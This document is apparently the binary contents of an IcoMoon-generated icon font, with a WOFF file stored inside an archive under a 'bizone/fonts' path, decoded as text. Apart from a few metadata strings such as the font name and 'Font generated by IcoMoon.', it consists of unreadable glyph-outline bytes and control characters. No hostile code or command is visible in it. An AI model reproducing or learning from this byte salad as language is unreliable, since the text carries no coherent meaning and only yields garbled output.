�H���0��d ��H��8x0��8x��`@H��t  � �!�"T#T$x%�(8)*+,,,�-X99�:�;$;�<�==l=�=�>p?8?�@@�AhBDC E E�F@F�GpG�H�H�I�JLK�L0L�M\NN�OO�P�QpRRxS$S�TT�UU�U�V4W,W�W�XHX�YdY�ZDZ�[�\\\\�\�]L]�^`^�_4_�_�`bc0dDd�e�fhghhXi�i�i�k�k�m|m�n4npn�o8o�pp�q�r�slt$t�u�v�w<x<yz�{�|�}d~���<���h��P� �(�����L�d�X� �������0�t��l���X���@�����t������l�0��D���H�����t���� ���@������4�`������0�\�������l���H���(�t����p��������D�l�����(�����`���0���������8���(�����p������P�L���,�����@���<������H��Ę���Lǜ���(Ȝ��4���x���T˨�̼�xͰ�,Έ�ϨЈ��� �t�<ӌ���0�|���4՜��8ֈ�ט�T���l�0ۈ�ܰ�`�ް�p���(�l�����,���<�l����T����4��H�$��,���@���H�0�H��������X���d�p�p		�
�T�
���`����H0<<�PD� �!"#@$,$�%�&$'H((�+,,�2�3p5�6�7�8\8�9H9�::�;�<�=|��<�`6uK
�		g	=	|	 	R	
4�icomoonicomoonVersion 1.0Version 1.0icomoonicomoonicomoonicomoonRegularRegularicomoonicomoonFont generated by IcoMoon.Font generated by IcoMoon.PK!��"hvhvbizone/fonts/icomoon.woffnu&1i�wOFFvhvOS/2``ecmaph\\�r�xgasp�glyf�=|=|_.�head?H66�|�hhea?�$$
�)hmtx?�||�{t�locaZ ��P��maxpt�  ��namet����J	�postvH  �������3	@�6���@�@ @ �c�6���� �������� h��797979���%5EQ]!2654&#!"&5463!2326=4&#!"3!2654&#!"#!"&5463!232654&#"32654&#"0�		�@		�			�`$`���	��		`	��



�



@			�		�		��`������		�		��






��@�-1AK7265463!232654&#!""3!2654&#!!!"3!26=4&#!"&=!p			%�$	g		�		�����	6�5	"�`!�	��		�'$�	�	�@		�	�@��	&.5 	0"
����(8<LV7!326=!2654&#!"463!2#!"&57!2654&#!"!!"3!26=4&#!5463!200		0��	�		��	P		�		� @%	�	% �``�0		0��@�		�@		0	@		��	@���%0		.&B �� �/3?!2654&#!"463!2#!"&57!2654&#!"!!32654&#"0��@	�		�@	P@		��		 ��



@��`�		�`		p	�		� 	�@`


��`�/3?M!2654&#!"463!2#!"&57!2654&#!"!!32654&#"32654&+"0�			�	0�		�@		��`�



0�		�		@��`�		�`		p	�		�`	���`


				���&,>LZhv�!2650450&54&'8581.'*1&"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"0���@�̼� 	��	�`	��		�`		�		�`		�		�		�		�`		�		�`		@� �`���	�%�p						�								��				�				��@� &9GUcq������7!265<14&14&/.#0&#0"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"3;#!"&=4&#"3!265<14&14&/.#"4#0"+"3"&=32654&+"32654&+"32654&+"32654&+"0@������	�`	p�	��
p�		��		�		��		�		�		�		��		�		��		'��	��
		@��		�	���		�		�		�		�		�		�		�		@`���I�	�	���		 ��				�								��				�				`���		 		 `�		�	���				�				�				�				���AMS���!26=041>7326764/>54&'04150450&54&'8581.'*1&"#!"3#"&54632#"&5%463!;.#"!"3!!"3!!"3!2033267#!"&532654&+"!2654&#!"0��$5+��@gIIggIIg��̼� 	��),M��		1��		��		HN,)	�`	��		�		�		�`		@���N-7\P �`�IggIIgg���	�%0"		1		1		#�		�				�				����-O_iw���!2654&+";2#!"&546;2654&+"2654&+"3!2654&+";!!26=4&#!"'!#!"&5!2654&#!"7!2654&#!"!2654&#!"!2654&#!"0 �		����		��		@		�		@		0���@#	�`	#���`		��		`		��		`		��		`		��		@�		���		��`			�					� �@#�		�#����				�				�				�				��>�+/?CQ_m{������%2654&#"#"&54&#"!2654&#!"!!!26=4&#!"7!!!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!2654&#!"!"3!2654&!2654&#!"!021812654&#"#"&54&#!"!0!"&5�#					(�@		��		 ��		�		� �		@		��		@		��		@		��		@		��		@		��@		��		��		@		��@		��		A\L66L�]A�		�[6L #P		��	P		��  	 		��	 ��	�		�	�`�				`				`				`				`				 				@				 				�]AP��6LL6P��A]�

L6B	��`�'1?M[iw��2654&#!"326=46;#"&=4&#"3!2#!%4&#"32632654&+"732654&+"32654&+"32654&+"732654&+"32654&+"���		��		���0@				���		�		�		�		�		�		�		�		�		�		�		�		@�%		%�`		���0@		��		W				�				�				�				�				�				�� �-=KYgu���������!".#!"3!2673!2654&!"&5463!2%#!"&5463!2"32654&2654&#"!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&��

�

���H�P				��				'��		�		��		�		��		�		��		�		��		�		��		�		9��		�		��		�		��		�		��		�		��		�		��		�		�����@����	��		@	��	@		��	�				�								��				�				�								�								��				�				�				��@�-7GKYgu���"#!"&54&#"3!2654&!"3!26=4&!5463!22654&#!"3!!!2654&#!"!2654&#!"!2654&#!"32654&#"32654&#"32654&#"0		� 			�	'� 	 	�	�	�		�`		���0�		� 		�		� 		�		� 		��



�



�



�	��		�		���	@�		��		��			�	� �				�				�				�










	��@���������4&#"#!"&54&#"3!26";326=3326=3326=3326=32654&+532654&+54&#"#54&#"#54&#"#54&#"#";%#5##5#3#32!546;2654&+"3!26=4&+"#2654&#!"354&#"32626=4&#"@			� 			��P		0		�		�		�		0		00		0		�		�		�		0		0�� �����	�		�	 	�		�		��		P								`		��		`		��		p		pp		pp		pp		p		�		�		��		��		��		�		����������			�		�						0�		�				�		�	���� �+Y{"3!2654&#"#!"&54&%!"3!2654&&"?326?326=4&5.'"&+";?32676&/>=4&#"	�			��		���		@		�d�
���		�		y��
���		�`	�� 		��		 	`				���
���y		�		��qq
tS		St
���+7Gdx!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>3281!'.#81"'&!0��`	�		�`	p&&&&


�
�		� 		��|Z�@�Cp�-��@��`�		�`		@&&&&`



�	�		��	 ���ub}`�LI		j���� �+7Gat�7!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>32!'.#81"'&""3!2654&+";2#!"&=4&0@��	@		��	 &&&&


�=�		�@		��|:�`�#p�-�	@				��		@ ��P		��		�&&&&`



� 	`		��	 ���uB}@�m(		k����	@			��			����(ADR`n|���������#"3!2654&#46;#"&!+32&"3267%>54&'%#";2654&'32654&+"#";2654&#";2654&#";2654&#";2654&#";2654&32654&+"732654&+"32654&+"32654&+"32654&+"32654&+"#";2654&�@����������Y	 ����@		@		G@		@		G@		@		@		@		@		@		@		@		@		@		Y@		@		@		@		@		@		@		@		@		@		@		@		G@		@		��`��0��@��@��`���������D�				`				�				�				�				�				�				`				�				�				�				�				�				`				��@�H\����#"&=4&#!"+";2654&+"&5!32>54&'!+";2654&".54>32".#".#!546;26=463!2;226=4&+"326=46;2"32>54.".54>32��.A?��F:0�!//!�		�Aq�VV�qA�		�!//��O�i<<i�OO�i<<i�)L`o<<o`L���9(+5?2.'9��	�			�		w<hO--Oh<<hO--Oh<5]F((F]55]F((F]; BC >/!��!/		�%P+V�qAAq�V+P%�p		/!@!/��<i�OO�i<<i�OO�i<@3S;!!;S3�G -0 G�	  		 		 	�-Oh<<hO--Oh<<hO-��(F]55]F((F]55]F(��@�SWay��#54&+";2#4&#!"#546;2654&+"#";2654&+"&=!+";2654&!!463!2"!54&#"3!2654&732654&#"32654&#"P@		@	�	� 	�	@		@P�		�		�		����@��	�	��	�@			�		�



�



�p			p0		��p			p�@			pp			� ��0		��@	��		�			�






��@�7AKi"#!"&54&#"3!2654&!"3!3!26=!26=4&#!"&=!%!5463!2"326=463!2326=4&#0		� 			�	'� 	�`�	�<	��	���	�	��			`			�	�`		�		�`�	@�	pp	���		p �		�		�		�		�����;Nav"#!"&54&#"3!2654&26=4&#!"326=463!2!"32>=4&#".=463!2267265.#"'&�		��			`	�y	��			`		g��h��ts٩g^��qsѡ_	`	��.	1\1
	3�	��		�		���	�	``		`		`	@�!I>((>I!��<8''8<�		�0
	
����&��26=4&+'.3:7%7>/32"32#!"&=46;26=4&#!"&546;3:7%>'.0"#!"3!26=4&#"#!"&53!2#"3!26=4&32654&#"	V�/�+K
�		��	�0""�`	C�}�+55+�		�0"!���



�	5:��4	5	�		��	�"" �5+�@+5�		�"v
����


��@�+AW���"3!2654&#!"&54&!"#!"3!2654&3!232654&#!"%"3265463!2654&#!>764'&"4&#".'.7>7>'.!"3!3267>732653267>76&'.'!2654&#%>32>"'&47>70	@		��		�		�`		�	�)	�			�`	�			@		��s
$$#j#
		)r

$		S'�n		+	$$--
		)q
$		R'�		��
""
r&bNr&�	��			�		��			�	�		��

		��

			�a	%f%##				�Y=* 
*76	

%f%	��		
>* 
*75
	�

L-l��L-l����/@P`#>54&+"#>54&+"3!2654&+"#"&546;2#3"&546;2#+"&546;2@f�f� ��`p		�		�		�		�	�		�	p����``����\	`		��		�		�`	���		�		����CGWg2654&+54&#"!54&#"#";#";3265!326532654&+!!4&#!"3!26%463!2#!"&�		�		��		�		��		�		 		�		� �� `����@	�		��	`		�		��		�		��		��		��				 �� ����`�		�`		���%GT4&#!"3265463!2#!"3!26"3!265732654&#!";#!"&5463!�`			�		��		 �0�			�		��		�		���		 		�`			D���					��			��@�+AWgk#"326=46;2654&!#";2326=4&"+";26=4&!";2654&+"&=4&%26=4&+"373#�			�		��		�					�		�	��	�		�		�		�		����		�						�		��	�			�		�			�	�	�		�	�����BFLQ[e!2654&#!"463!2#!"&57:3%267>5764/&"013'#5%';62'0��`	�		�`	`@Cu�)x��e�"��7KN��I���$�@	T��W��l�@��`�		�`		A`Fu*�x����v!��
&M��K���@%�V	FQ��l��� �+7CO[gu���!"3!2654&#!"&5463!2"32654&"&54632"32654&"&54632"32654&"&54632'2654&#""326=4&"32654&2654&#"�`,,�,,�`��&&&&


�&&&&


��&&&&



								�				�				�,��,,�,�@�p&&&&`



�`&&&&`



&&&&`



�	 		��	�	`		`	`	�@		�	��	�		�@	����EU_"3267>767>54&#"'.'.#"&'.54&#%54&#!"3!26'!5463!20		#hhXVef#
		
%smORpu%
	P��	`	 ��	 	�	�bO_YY_O	�		�b_jUUj_�	P��		�			������47o�����4&#!"3!26554&#!"3!26=4.'>!#0&1'54&#"01#54>7>54&'.=!7!"3267>7>764'.#.'3!2654&#!"3"326=4&'"326=4&�
�~

�
!	��	(;CE:&	@	)<CE:&����D@.I�		�I*=ED@. *=EZ��P,'L�$?�<���

�~

A								�				�t		t;dP;<Pa:t		s;dP;<Pa����6Ld;c�		�d9`L85Lc<dd9`L8�1B	>+	�3!.��				�	 		 	`	 		 	
����2;?CGKPZd"#"3!2654&+54.4>32#54&#"#)54632#7!#7!#73#7#53!"&=!!5463!2�BuW20!//!�!//!02Wu��-Oh<<hO-`qOOq`���^BB^נ��R���R����ɠ��	��� @����2WuB`/!�@!//!�!/`BuW2��<hO--Oh<``OqqO``B^^B��������������PP����
Yd|�"32654&&"#!";32654&#"&'.'332654&#"&'.'323267>54&'46;#"&5.+"&#81"+!2>72654&#"�				@	$b��z�D#11#m/$`=		6U(`3 		(�z��c$��ll@&g��{�k0{��f%�p				�	� 		�	'F=*2$��#1n/$$		(a4		'
*>F
��{V�@�G=)�)=G��	V		��	��`�I"676&'.5>73267>54&'.'&4&#�k�j6Rrz(
0vhG8`�X	��u-Y�Y
KuR1`�� 	�3>5��f�zSQs�\;	13*�0		H��|@-84		
*0+��k�yK�	��/�
iv��2654&#!"3!"32676&'.'&67>;326=4&5>5323267>76&'.#.5!"3!26=4&#!5463!20		��		 ��OQ
+4631)
M60DXU		_cM06M)3476+QOPI^YOS@�@%	�	% �``�				 -K) C?52;?";��Q[7P		P	7[Q0;">?6:BB)K-��IuU44TuI0��%0		.&B ��n�o}!"3!23265..#!!2!0&'.54&#"30:1267>'.'>76&'.#!"3!23"#4&#"326���		`*		!
��P"k�E		&���	%-)

),&	��

.1''2-��				�	� 	"		�;��-��
			AB9
AKH			SR=
4HK���		� 		���Xr���833:7%23267201%>'.'&"?.%54&#"6&'&%676&/&"3267>54.#"2.54>4&#"326"&54632(\\ ��
���==��		��=
=���
�� ]R`O*Id99dI*O`R3X@%=QPOQ>%@X�T<<TT<<T�.BB..BB>^^�
0Y
O���
�VX

XV�
��O
Y��
�S��Y9dI**Id9W��T�%@X3I�yWYx�H3X@%�<TT<<TT4B..BB..B��`�z�4&#"#"3267>32#"&'.#";>54&'.54632326=>3232654&#"#"&'40154&+8#.5467>5:;23267>32#"&'.#"+.5467>54&#"#"&=>3232654&#"#"&'546;029>54&'.54632�MTJZ	
�8U)GH'V7�
G<;G
~4A

" 5XP0 (	
B3~	5~*+!	,4E(	!),~
	NTIZ	�)D	
' 4[\4 &	F'�
I;;F
C/NE8!"
M3w
	B>?P	�6S	*33*	I9�OMSM
s:L
"!8
@&t 	F:@<
�$>	
"!.OE8!"
	A(�
aNNR	
w*6
	*33*	��@� .?M_p����!"3!2674&'.#!"&'!%2654&#"#023>'.!2654&#"3:12676&'&267>'&"&32676&#";2654&!2654&#!"!32654&+"�`�`����{w{��				�	 
	 	�				�	 	
 	���
0��
�� �		�		�y		�		�g�		�		�	#$���L	 		��	
 	
��	 		��	 
	��

`
��|��
`
��				 								����?ES&"3!2654&'>7>323267%&"32676&'%!62%!2654&#!"�(��Z��'�q���
*����q'3���a 		��		�

����^;�����i
	��9�
�L�Hc�				����
3BYe4&#"32654&#"3263!26=4&#!"01!"&/7>3.#!"3!26?>54&'%!2#!5�				��rp
�

�E
��Eqr��
�E

�
r���qr�D00	��		�"		"		6ZX	�	�WZ�Q	�	ZHWZ���_�38FPb��.'&"3:?3:373:7%>764''7%'81'81'7%'041/%.3263>'#"326?3326=33267>/54&##546;2o����0������$�.�:�L�Xa��5����`%��I		I��% �`v�yosVC����WioQ;�o�?(3��vB� �j%*�
��		��
�(&` ��@��2>J����?>03261>?>?6326?>/.?>?>70654&1././&6?6&/././.'0&#"1&/&01'46146?>?6&/&4?>?>?>30632126?601#"&#'.#0#"&1"&/./.#"&/.?>/./.50&52654&#"2#"&546+"012?201:326?46?2?>/46?>3267067>16&/"&/46?>/."&/.754&'0&'.1*#""&/.7>/<1732637>?>30301?:121001#"1/.#"##10&'.#0&156&/.#"*3'0617>/4&/.5067>506132672654&#"72#"&546v
-	&
I
	


	I	&	-
S

S
-	&
I
	

	I
&	-
S

SVT-%	I	I	$-
TT-%I	I	$-
T�IggIIggI<TT<<TT<

4*
:

	
) 	<

4*
:

	
) 	
*	
		9*
	4<

*	
	9*
	4<
�(88((88(&&&&		I
&	-
S

S
-&I
	


	
I
&	-
S

S
-	&I
	

WI	$-
TT-%	I
I	$-
TT-%	I
�gIIggIIg@T<<TT<<T&

	)
 	;
	4*
9

	)
 	;
	4*9
8*	4<

*	
	

8*	4<

*	
	
�8((88((8�&&&&���Ew��267'32>54&'7>=3023>75323:7>5<=4&+".#"3267>;2#"#"#".54>2654&#"72#"&546�k���JtQ+�``
|	�Z*CwY33YwC'�|	p	p	�&IiB=kP..Pk.BB..BB.!//!!//�=��
��5Vm8 BI�
����3YwCCwY3lw	�	�	�LB&2bM/.Pk==kP.�4B..BB..B�/!!//!!/-��>�X267>54&'&67>'.7>7>3201227>54&'.#0"1"3�0b$*z+�b�!\!��+�5jJ**I�#� U11V��!!8<-%%55*+�O�! ))��+05<! ?sI+*J��V11V !�� LMI������:r�2326?>54&'.#"01"7>'&6?>32'&>'.#"&'.546?>656&'&302126?&"326764`6�45��)(�0	|	�)(�0	!@�56���P���65�F$6�()�	�I&8�()�	�65���P�
��@�1=Iav��!"2?>3!2"/&"3267>54&#4&#"326'4632#"&%"3267>54&#!"'&47>3!2"32654&"&54632��%*
*
@	�=U
U	
�/%&&%`



��%�@
N

���Q�>���
@�&&&&


�++	��	�AU
U�&B�&&&&


-�<(���&B0��	�AM�	0&&&&`



����q��"0232676&'%.75045.'.'.54>32"&"1'&27>75<54015467241>54.#2676&'%&:&:32676&/`?~e>?>-��0999[r:;sZ8J'1��
	-@?=d~A�	���	��1[�RP�31%	98
/40zHJwS,,RwK_r!5/ 
%15�RS�[0�P::/.���2d�%&"3267%>54&"'%.5467%>32&"'%.5467>'.3267%>54&'&"'%.5467>'.3267%>54&'��&o&��q00q&��^��r((r
��[��
q00q
��[��
q00q���! �

� !T��	�				�	{
		��		
! �� !�	��	 !��! ���?DINWe3!:7>781401>7<14654&5405.'0&#'&"3!"7	777326=7%46?>'.5	�e��w)�u#��	����%�N��!7XT
@W��U�l�l/	6$x�

u��@
��@$�%�N�Kd�!��
�	V��Q��l�l����E�������0326764'.'764'&".'764'&".#.?>02764'.#&&".'&"33126?>/&"#81"&'0&'764'&".'764'3:3%267>57>54&/&"01'#5	';62'7 7M-23%st�
5L.
.K61��3

-J5
����tt%3�J@#u�*x��e�!�7K�M�	J|����H@	T��W��k�l26K.

33%tt�
!:N/
.N:!���3

,L8 		�,���ut%3�`&u

�x����R!�
&�N�Kl��@�zV	FQ��l�l����M����>5.'&.#"26?>3267>'3267>'.'""/&4?2?#"&'&'764/&&67>3267>'&67>"'&"38126?64'&"'&"326?326764/764''7�7x+(�� )L*p1o*&E(q )L*p0p�0*]@#
��$ V)^1*]@#
�# V)^���A
-��@-�`@`��KI)I�+)u6��+v7p2p
	)u6q,u7p0p�0_*T ��
.j$ 
_)3_*T �
.j$ 
_(��@��0(@��0p`@`��4I)I	���=Vbn���%2654&#"72#"&54632>54.#"&'4&'.	32#"&'.54&'.'32654&#"#"&546323267>54&'&67>'.#"3267>5467>764'&"#"&5463267>7732654&#"0.BB..BB.!//!!//�\D,N:" 9O.jR�
Ej}9<S�.�aqOgkK:L	ZB3tcF%B..BB..B�/!!//!!/t*WF,	��
@-AN��2.O9 ":N,D\

	 L:KkgO$:
� B..BB..B�/!!//!!/#N<<":N,,H5Lt��m,0M$�
S^IKk23G$/X3)b~�d�
.BB..BB.!//!!// 
'az�^��
VO�kU�	5H,,N:"<;_ 2J31kKI^
>

����6;E|3267.#!";21'"32654&'4&'.'.5463!!5!2!>830#"&54674016417>54&#81#"&'5!+"�$$��$$�	:
6,,7#*�3���!>��d%%G���<1 $&$$��$#?@

4??4		
6G"~~b��%��55GD0!CC9M=���3J^r�"326733267>54&'.'4&'>54.	"'.5467>32%".54>32"32>54.".54>32PE{[55[{EAt-E			

		

	��,E)/5[{2		����?oR00Ro??oR00Ro?2WA&&AW22WA&&AW2+L8!!8L++L8!!8L�5[{EE{[5/)E		��	

		

	E-tAE{[5�f��		0Ro??oR00Ro??oR0 &AW22WA&&AW22WA&�@!8L++L8!!8L++L8!����_��26=326=4&+";'3#326732673267>'>764'&"'>54&#".'&"2326762#".'&47>374632#"&53267#"&'p			@		

  ���/e56e.��,D
LK54KL
D,�c
-u@At.
)DKP*)QJD	�8'(88('8,
K@"!@	0	`		`	0	�@�f��
!B	�35JJ53�	B!��
�-11-(..(�(77('88't���@�HT`lx".#"%>54&#".#"32654&'326732654&'32654&##"&54632"&54632"&54632"&54632�(8��	
$
��8((8�	
(88((8�	$
"8((8	
(88(��&&&&&&&&�&&&&f&&&&�8(%
�?�	
(88(%
��8((88(%
`�
(88($
�8((8�`&&&&�&&&&��&&&&`&&&&����7AO]7#"3!26=4&+5>=4&#"#".=4&#"!546;2"326'6&#"&54632�_%	@	%a0R=#

!8K++K8!

#<R/�����<UU<<UU3A..CC..A��%0		.&�)AU0<

<+L9!!9L+<

<0UA)� �V=��=VV=|=V��/BB/|/BB/����
��4&#!"3!2667>772013!2654&#!.5467>54&5>7>'.&'&""'.'&67>764'4&'3223267>54.#"&5.%.#"32:3267>54.�	��		@	�i
.7
))A;A�		�F=5F/



	!
C!
$
	SSQ-_X?Lgg<e	
OC'[>		9R#:/	!3>0				�'1%	(B=6�A+H		:"9|1AQ6@ 
*
/(H{)!Al7[wABz]:z�G=?l:�		9RoG#k^bn$MvY>
��V�
1Ng2654&#!"33!2676&''.=4&+"##!"&'&6713267>3253.#"#"&'#74>0		��		�,2�2,�	�	�&��&
�4--4-&�
��8-4-&', �				��%0

0$>3FS'�		�*ZK1��T

"

��"���D�%3O`��M�.<HT.#"3!832676&'#!"&'&67>322654&#""32654&"&54632�F''F�xN3
2N�xw@*��*@�88��				&&&&


a.11.�\/\&$(($%].���L'�&))&�['K$	@		��	P&&&&`



����A��6?>32'&:3267021061263461647<124176&'&.#"4&+"&'&673263>/4&1&4#.#"4181.#0"1*#?;265%6&/.#764'&"01326764/%267�b
c11�~� �@$$@E	�%9�4@�~�G.�	�@B9%��E`_DI.Hk�
�"$$"�� �v-)-,)��	D#4�� ��+U"!%
6"T)��#CF`^D$!��]�my732>=326764/.#"#"2?!2654&#!5>54&#"!"3!.=326764/.#"272#"&546FM��[[��MG`aGDs�R		��)7B..B7)��		R�sDGcb
!//!!//cF[��MM��[G
`a
GS�vJ_		�>*.BB.*>�		��Jv�SG
ba
=/!!//!!/��{��67>7>7>74&'.'4&'.5467>5>30213:7>'.'.'.'>7>54&'.'#":GLD7#;
,G^66^G*B)7DJG9	ANQ-6
)C

0Oi<:hO2:$	7-ROA?.=&V#Z57
=jO./Pm>.=g!	#U%;-5D);'#j>7
CuW31UsBA5[!';,E5��{��"3:7>'.'.'.'67>5.'.54.'0"#81"767>7>7>74&'.&'>54>3021'�7DJG9	ANQ)5sk!$+Lg;<iO.$!�Z4(
ROA:GLD7An ")F_65[C&" dS)#U%;-5D)5#	;MWRDxY44XuCRWMF!2,E5.=&U#$QWR<jO/.Pl?RWQ

���vy����"!#"3267>5.#!"!'32654&#!";1.#"32>7!#"3267>5.+32>54.%#.'!7".54>327!#!".54673267>'>32#�.V%�3-		&:	��Z�c�		��		Jmb"K)E{[55[{ECwZ6c.		':	~�w4%5[{EE{[55[{�^���)9"}��>L��?oR00Ro?$D�22Rk<`?oR0E9��!M)?oR00Ro?`N$		 E	��				��5[{EE{[52VuC#		 B��<EO*E{[55[{EE{[5��N��T+OF:���'��v0Ro??oR0��=iN,0Ro?L�*��
0Ro??oR0����*3Kb4&'.#!"#&3!26=4&#>5!5463!2!.#"#"&/.54673267>32#".'�!��  6^�K�$	�
%}K\4��� �9.,LY%$PFEP$,!R@LY%$PF,7XuC<jT<
�6�..�6G�uL��$		&Lu�G��)v/$!!

/|*��$!@f?3Tl9����&7GWhx��4.#"02183326720183>5!.54632!.54674&'>%467.5>54&'";26=4&#+"&=3�7p�qq�p7��������),

,)W))W�� %!RG1^a @ a^1GR!% ��ad32"6B!.dS6%!B6"23da6Sd��	`		`	��LqK%%KqLW��``��WC�~ff~�C�XX�9wpb%"bqy9q�"�``�"�q9yqb"%bpw9_z$zV2hc\&%[eh2��&\ch2Vz$z_2he[�	``	p		P���'7A�2>54.#"2#".54>"3!26=4&#!5463!2'01326=041>72764/&"#"&'.546764/&"�E{[55[{EFz[55[zF?nS00Sn??oR00RoQ$	�
% �� 
�	
M�9&0
9�PP�99<<91%+ /CJP)5[{EE{[55[{EE{[5�0Ro??oR00Ro??oR0��%0		.&B �3		3;4%19<<99�PP�9
1&EJP)+TMG- ����6Bfr~���������	738126732673812676&'>'.#".#".#""&'>7467>7>7.'.'..'>77>77>7.'.>54&'.'>7>7.'#"&'>7>72.'.'>%2.'>>32.7#81"&'&672654&#"72#"&546S=<]88]<=S-JJ-S=<]88]<=S-JJ-�,M$K%%K$M�-00--00-22(<$"�<"$�22'<$"��$<"5F37	%?=3�3F3=?%	7��,M$K%%K$M�zF37	%?=3[?%	73F3=W!//!!//!�!"]nn]"!*�OO�*!"]nn]"!*�OO�*�aR		Ra�66668**))� <	
F< 
�**))� <	
+
	< 9"L)4@s�%s@4)L"�aR		Ra�"L)4@s%��4)L"%s@8/!!//!!/����.:F"3267>54.#.54>32"32654&"&54632�O�i<p�vv�q<i�Oty]7`�II�`7]ytOqqOOqqOB^^BB^^�=h�Pw�nm��yP�h=�%t��fI�_88_�IhȤrqOOqqOOq��^BB^^BB^���*6BNZfr~��"0212676&''.7>3#%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"54&+"021812>'"&'.54>313B]]BB]^C5KK55KK4�



�



� 







��



�







�@



�	�4]F(&$$]34]F(�-R!$>R.�$=Q`]AC^]AC^��K55JK55J�






�


�3


3


�3


�


�3


Q�	(E\44^$%'(E\�#  R-.Q<#�.Q<#	��@�@d�������&.'.##"&'&3267>7:3267>=>54&'4.#"3267>732>"&'"54&'.54>32#"32654&"&546327"32654&"&54632%"32654&"&54632u^WW"7>\-
1fC
-T>Bc�O��oqS#7E!�FCq��I� D1g A6"N��jh��KD}�j&&&&


�&&&&


�3&&&&


�]F>]z !
$/�,g5Qm2\�tBCt�[7]N?�LM	:i���
8F�:IW3T�l>=k�VS�a5�&&&&`



`&&&&`



]&%%&`



����0Z".'.#"3267>7>54.#.'.54>3227>7>32`;o--o;BuW2/!/��mm��/!/2WuB�*��qq��*=7-Oh<5d(!!(d5<hO-7=�+(##(+2WuB-QLJ&8�rNNr�8&JLQ-BuW2��1tkSSkt1H�S<hO-'$++$'-Oh<S�H��@�S.#"3!2>54.!".54>;2654&+">32326=81?<m�e]�wG3N5/Oh::iO..J\L�3]F* @`@0		0;i�`g�b0		$OB+)F] P�uFAs�\BQZ'=nT19Xl3>lQ2��,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3��@�y.#";2654&+".54>;2654&+">32326=81+"&5326764/&"2?;2>54.?<m�e]�wG3N5/Oh:�		�3]F* @`@0		0;i�`g�b0		$OB+)F]4�NB���
�U[�:iO..J\ P�uFAs�\BQZ'=nT1		,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3BN������I[U9Xl3>lQ2��@�}.#"7>32326=85#!".54>;2654&+54632'&"326?64'&"4.#"3!2>54.'?;m�e0-g�b0		%OB*(E]6�0\H,?`B0		0gYQo�
�

�
�#<R/3S: ?`@!%IlF=iM-1L[)!O�tFJv�K0		0#CdC9dI*#DfC1aN0		@YhpQ�`|
��
|�/S<# :T3B8Sh57mV6/Ro@LpK'��;�Y����&"&#76&'&#76&'&#4.#"32>733267>/33267>/3633267>/76&'".54>32#4.#"32>734.#"32>73#".54>32##.#"32673#".54>32#3#"&54632#&9L-9K39KQ��jj��QQ��jf��UK93K9-LGG��c��LL��cc��L`=h�OO�i<<i�OK�fA`P���)E]55]F((F]51WC,`<]zEI�`77`�II�_8`�J55KK5,Db';K*.R=##=R..R<$`pJ
1(88('8P

[E[E[j��PQ��jj��QK��d[E[E[UU��L��cc��LK��cP�h<<i�OO�i<6_�J^�yF�5]F((F]55]F("=R/CuW17`�II�`77`�I5KK55K6*)F4#=R..R=##=Q/ $8((88(

�����'U[ch2>54.#"2#".54>32673267>54&!6&'."!&!>2.'j��QQ��jj��QQ��jc��KK��cc��KK��]��/H1
���,bdb,���
1H/RJ�@���&QTQ&��JRAQ��jj��QQ��jj��Q�K��cc��KK��cc��K����DQ[2
6��
2[QD-Q�/X��%����/�Q���+;B4&#!4&#"32>%4>73!#".5%!2654.#"!�	�P	`�~IG|�d\��K��Aq�W	�Hv�T]�tB�	I~�`		U�pC�`�	�	I~�_d�|GK��^W�tG�O	T�rCBt�]O	`�~I	�?	�Dp�U
�����(6DRcu������"32>54.#".54>3226=4&#"#";2654&;2654&+"%26764/&"&"326764/64'&"326?326?64'&"#&736=4&#.54673'267>'764'&"&3'>32"'&47j��QQ��jj��QQ��jc��LL��cc��LL��S��@@�@@��22�00 33��00W����UU=		

$

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K@@���33��00�22�J00RP�
<UUF
s$$���%/:JTboy�������������32>7465<'4654.#".'>7373.'>7>32#"..'>73267!467.#".'>774&'>7'.'#"&'>32.'>7#467.'.'3>7.'>74&'>7.'%.'>#46T��gg��TQ��jj��QD#�3,%'�-::	""(Bl!@!(4<<��<<!@!lB(
#D�(Bl!@@::	""�!@!lB(�D#D'%,,$D*=h(*D$(h=�').j$D*=h�	*D$(h�'�.�g��MM��gj��QQ��j�#H$1]�C{5
,c5�@gI''Ig�vT
T�(~'T..T'�%D 'D�
Tv(�T�,X+1m:�T�(vT

@gI''Ig:
Tv(�t+X,:m1�$H#
*]1�
5{C5ct
<a"L2�"a<
2L�>s3
;�M,
<a"Lc"a<
2L�
3s>M����';p����32>54.#"2#".54>2>54.#"326=2#";#54&#".532654&+>726?32654&'76&'..#"374632#"&7.'7Q��jj��QQ��jj��Qc��LL��cc��LL��cV�qAAq�VV�qAAq�6		K�g@0		2<i�O		J�_72		0;^zF��(8��	(8��&&&&�@
Y�V�j��QQ��jj��QQ��vL��cc��LL��cc��L��Aq�VV�qAAq�VV�qA0		27_�J		O�i<2		0@g�K		Fz^;���8(��8(	��&&%%�Y@�
=C���}!3D���+@Tbv����326?64'&"326?64'&"&"326764/326764/&"326781>7>7>7>781>4&'.'.'.'.'."8181>762818181818181"'"&'.'.'.'&47>78181>7>7'>7645.'&47.'.'7.'.'7:7>7"%'>7>7.'.'7'.'&"'62>7'>7>7>"&'&3267>'.3267>'.4676&'&>4&'.3267>232676&'."7�_^�^_
@
XX�XX-"5&P))P&
	2%	'.
&PRP&

2%2	
������T 
�

J0�J		J?�U.	J


�!$
�

J
*yJ
		J?��	J

�!.�7x|x7
:�BB�:
�P!""!  
z!""!
  �V7x|x7:���:
g_^
�#^
^�XX�"
X
X�	
&PRP&
.'%2	
&PRP&5"%11
		


?�@J		ZJ?�@J		
�*
J

�#Y��p!�

J	. 0J

�
 G��-�

J	.!�  
"!!"
�:���:
7x|x7
�:���:
7x|x7
�  
"!!"
